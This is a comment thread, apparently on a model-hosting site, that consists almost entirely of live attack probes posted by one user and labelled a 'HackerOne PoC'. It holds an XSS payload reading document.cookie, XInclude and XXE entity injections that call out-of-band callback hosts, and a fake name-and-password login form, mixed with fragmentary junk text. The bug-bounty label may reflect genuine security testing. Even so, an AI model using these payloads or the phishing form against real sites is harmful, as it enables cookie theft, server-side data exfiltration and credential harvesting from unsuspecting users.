Discussion Thee Eclipse

#1
by fingerprinted - opened

Discussion Thee Eclipse

![mz.png](x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">)

dsdsa<xi:include href="http://qoi4hz26hhz3ey1fpta9lpvhq8wzkrjf8.oastify.com/foo"/>

![mz.png](x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">)

dsdsa<xi:include href="http://qoi4hz26hhz3ey1fpta9lpvhq8wzkrjf8.oastify.com/foo"/>

]>&xxe;

]>&xxe;

]>&xxe;

hn81x031qj93mjb7xf1aca28wz2rqmsrgj4br1fq.oastify.com

lic

Hi]]>><

]>Hi&xxeznsmd;

]>Hi&xxett31p;

]>Hi&xxehlf3p;

]>Hi&xee2qtri2;

fingerprinted changed discussion status to closed
fingerprinted changed discussion status to open

<fak xmlns:xi="http://www.w3.org\/2001\/XInclude\"><xi:include href="http://u83813ma1lj7y2lj9xud5tflacg34v8jx.oastify.com/foo"/></fak>

<fak xmlns:xi="http://www.w3.org\/2001\/XInclude\"><xi:include href="http://lyjjvvlkkvqrvawaoaxwtr57mrs4s4la7.oast.fun/foo"/></fak>

PNG HTML.svg

ds

ds

IMAGE IS TO BE HERE BUT WE USE NULL :X

HACKERONE POC FOR THEE ECLIPSE

<form style="display: inline-block; padding: 20px; border: 2px solid red; border-radius: 5px; background-color: white;">
    <div style="margin-bottom: 15px;">
        <label for="name" style="display: block; margin-bottom: 5px;">Name:</label>
        <input type="text" id="name" name="name" style="padding: 10px; border: 2px solid red; border-radius: 5px; width: 100%; box-sizing: border-box;">
    </div>
    <div style="margin-bottom: 15px;">
        <label for="password" style="display: block; margin-bottom: 5px;">Password:</label>
        <input type="password" id="password" name="password" style="padding: 10px; border: 2px solid red; border-radius: 5px; width: 100%; box-sizing: border-box;">
    </div>
    <button type="submit" style="padding: 10px 20px; border: 2px solid red; border-radius: 5px; background-color: red; color: white; cursor: pointer;">Submit</button>
</form>

Hackerone Poc Final

hi, exploit for incosistent mime types

poc button.svg


PNG HTML.svg
ds

ds

HACKERONE POC FOR THEE ECLIPSE

[FILE HTML.svg]

Click here CLICK THIS BUTTON to reply directly to the comment. If you are not subscribed to this feel free to Unsubscribe

Sign up or log in to comment